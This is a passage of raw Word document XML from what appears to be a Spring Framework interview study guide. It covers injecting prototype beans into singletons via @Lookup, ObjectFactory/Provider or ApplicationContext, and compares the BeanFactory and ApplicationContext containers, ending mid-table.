        <w:t>If I have prototype bean and singleton bean, then how can we call prototype beans inside singleton</w:t>
      </w:r>
      <w:r w:rsidR="00A66A4A"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ean</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="454"/>
    </w:p>
    <w:p w14:paraId="57EFCFDB" w14:textId="31838A4E" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21"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hen you have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bean that needs to call a </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bean, you cannot directly inject a prototype bean into a singleton bean using constructor or field injection. This is because Spring's </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means the bean is created once and held in the container for the entire application context lifecycle, whereas a </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prototype bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is created each time it is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2605F2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o manage this, you have a few options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2B7E7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Using @Lookup Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F15F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Lookup annotation is a Spring feature that allows you to dynamically look up a prototype bean within a singleton bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B495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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8DAC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14D03A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62918936" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0449C64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ookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47FCE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PrototypeBean getPrototypeBean() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD76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override this method to return a new instance of PrototypeBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E4EA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409CDA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69D073" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626EB4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4C0216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getPrototypeBean();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07387AB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1CC8AF0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9EF4C4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C4E0421" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680132A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10090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5DB26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1F55F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3A5D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012DBCB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2AE68C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7F5F356" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186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Here, @Lookup allows Spring to inject a new instance of the PrototypeBean every time the method getPrototypeBean() is called, even though SingletonBean is a singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0184D7CD"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Using ObjectFactory or Provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605797B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ObjectFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05189BA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C17AF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53C6FC03" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BED20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1A8C800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ObjectFactory&lt;PrototypeBean&gt; prototypeBeanFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1887CD" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171E959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0B5DC50F"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Factory.getObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D85F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9E8894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8E74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B756CB4" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D8153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6B311C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4EBD287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9C5B00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FA84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DE6B50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6BBD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E638377"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Provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7334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mport javax.inject.Provider;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013672AD" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DA08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7830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28B2A347" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682EAE4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61E0278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Provider&lt;PrototypeBean&gt; prototypeBeanProvider;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58D15C" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D64B18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5AFB72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Provider.get();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6ACF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BB2E8D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99AE28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5F078BB" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6554802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5C5AA1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3B1C191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3FFB59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289BDA8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7E1BEEB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0A1FC1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150998E" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187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Both ObjectFactory and Provider allow for the lazy retrieval of the prototype bean. The getObject() method (or get() in case of Provider) will return a new instance of the prototype bean whenever needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FB3F3"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3. Using ApplicationContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747698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also retrieve the prototype bean from the ApplicationContext using the getBean method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A89B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4547CE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0848BF67" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E3943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5AB97B2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ApplicationContext context;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B6BFCB" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E897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3714712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context.getBean(PrototypeBean.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264501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049891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01DD88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07A4D4" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644B3C4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554FD0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187B27E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7B7355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5A85413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522A35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E0C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618CAD6" w14:textId="77777777" w:rsidR="009F2C21" w:rsidRPr="00085CB4" w:rsidRDefault="009F2C21" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187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case, ApplicationContext.getBean() can be used to obtain a new instance of the prototype bean each time performAction() is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A4F9A"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Approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223CBB50"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kup Annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows dynamic resolution of prototype beans within singleton beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAA2FD"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ObjectFactory or Provider</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a more flexible and programmatic way to retrieve prototype beans in a lazy, on-demand manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B7CDB"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getBean()</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Directly retrieves prototype beans using the ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71B93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111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F48E7A2" w14:textId="3714B556" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="0072390F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="455" w:name="_Toc197867669"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are containers present in the spring</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w14:paraId="3D770788" w14:textId="5A88565E" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are responsible for managing the lifecycle of beans and the overall configuration of the application. The Spring container provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism, allowing objects to be created, wired, and managed with minimal configuration. There are two main types of containers in the Spring Framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A68B9F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BeanFactory Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB2C5C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the simplest container in Spring. It is the base interface for the Spring container and is used to manage beans in a very basic form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59E14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azy Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans in the BeanFactory container are lazily loaded, meaning they are created only when they are first requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223F193"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asic Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is suitable for small applications or scenarios where performance optimization is crucial since it delays bean creation until it’s actually needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7889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E40E4C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bean id="exampleBean" class="com.example.ExampleClass" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A945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can be used like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687184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factory = new XmlBeanFactory(new ClassPathResource("beans.xml"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4B36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xampleClass example = (ExampleClass) factory.getBean("exampleBean");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C362D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ote</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: BeanFactory is now considered outdated. It's been replaced with ApplicationContext in most modern applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3A594"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ApplicationContext Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3DF93"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a more feature-rich container compared to BeanFactory. It is the most commonly used container in Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36050F2D"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It provides all the functionality of BeanFactory, with additional features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event propagation</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AOP support</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internationalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i18n), and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B240617"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ger Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans in an ApplicationContext are eagerly loaded by default when the context is initialized. This means all beans are created and initialized as soon as the context is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A8AE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Key Subtypes of ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FA52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7EEF657D"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for web applications with Spring 5+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41155F93"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upports the creation of beans for a web-based Spring MVC application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C006B48"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6720A409"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for applications configured using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i.e., @Configuration annotated classes) instead of XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41E94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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F13DE"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to load an </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML-based configuration file</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is one of the most common containers when using XML configuration in Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACA2C00"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1906DBB0"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specifically in web applications that use the Servlet 3.0+ container and Spring MVC for web-based development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3726A0B1"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568"/>
        <w:gridCol w:w="4415"/>
      </w:tblGrid>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="0C0433D4" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FEF7127"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FD4D09D"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BeanFactory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22540302"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pplicationContext</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="59828B1B" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1845062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ading Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0A2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azy Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401DFD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ger Loading (by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="27E43149" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="001F7669"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vent Propagation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="520E475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08D3294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events like ApplicationListener)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="6BBA2684" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78438DD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nationalization (i18n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A56684"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2E5AC812"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MessageSource)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="7716DF83" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F6476D5"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OP Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2FC45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3F8BF3DB"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integrates with Spring AOP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="7B9010C3" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
